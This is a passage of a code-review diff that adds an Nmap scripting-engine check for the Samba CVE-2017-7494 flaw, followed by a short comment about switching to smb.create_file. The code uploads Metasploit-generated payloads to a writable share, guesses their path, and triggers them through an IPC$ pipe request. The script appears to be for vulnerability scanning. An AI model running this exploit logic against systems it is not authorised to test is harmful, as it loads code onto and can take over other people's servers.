scripts/samba-vuln-cve-2017-7494.nse

```diff
@@ -0,0 +1,531 @@
+    table.insert(candidates, common_dirs[i] .. string.lower(share_name))
+    table.insert(candidates, common_dirs[i] .. string.gsub(share_name, " ", "_"))
+  end
+
+  return candidates
+end
+
+--- Uploads the payloads in the array into a file each on the writable share.
+--  Because the execution of the payload must match the architecture of the
+--  target system, the function will try to test against each payload from
+--  different architectures. The payloads were generated from Metasploit.
+--
+--  The function will then test if the system is vulnerable by making a NT
+--  Create AndX Request on the IPC$ on the actual path of the file containing
+--  the payload. It will first try to see if the actual path was retrieved
+--  using previously by checking for the path argument. If it is not supplied,
+--  because we do not know where the actual files are stored on the filesystem,
+--  we have to make guesses on common directories. The status returned when
+--  the payload executes is false, indicating that the system is vulnerable.
+--
+-- @param host The target host
+-- @param samba_cve The vuln table containing information for the results
+-- @param payloads An array containing payloads from different architectures
+-- @param name The name of the writable share
+-- @param path The canonical path of the share
+local function test_cve2017_7494(host, samba_cve, payloads, name, path)
+  local status, result, err, share_name
+  local candidates = {}
+
+  -- create the files of both payloads on the share
+  -- the files are named as follows:
+  -- <index><base_filename>
+  for i, l_payload in ipairs(payloads) do
+    for _, anon in ipairs({true, false}) do
+      status, err = smb.file_write(host, l_payload, name,
+        tostring(i) .. filename, anon)
+      stdnse.debug1("Write file status %s , err %s", status, err)
+      if status then break end
+    end
+  end
+
+  -- check if a proper filepath is returned from smb probes and use it
+  if path then
+    table.insert(candidates, path)
+  else
+    share_name = string.match(name, "\\\\.*\\(.*)") .. '/'
+    candidates = enumerate_directories(share_name)
+  end
+
+  -- try all candidate payloads
+  for h = 1, #payloads, 1 do
+    local l_filename = tostring(h) .. filename
+    -- loop through all common candidate paths
+    for i = 1, #candidates, 1 do
+      local path = candidates[i] .. l_filename
+      local pipe_formats = {"\\\\PIPE\\".. path , path}
+      -- test both pipe formats for each path
+      for j = 1, #pipe_formats, 1 do
+        local curr_path = pipe_formats[j]
+        -- make an simple SMB connection to IPC$
+        local status, smbstate = smb.start_ex(host, true, true, "\\\\" ..
+          host.ip .. "\\IPC$", nil, nil, nil)
+        if not status then
+          stdnse.debug1("Could not connect to IPC$")
+        else
+          local overrides = {}
+          local smb_header, smb_params, smb_cmd
+
+          -- perform NT Create NX Request on candidate file paths
```

Comment:
I found that smb.create_file performs the same request and supports the modifications that I need, so I am using that now instead!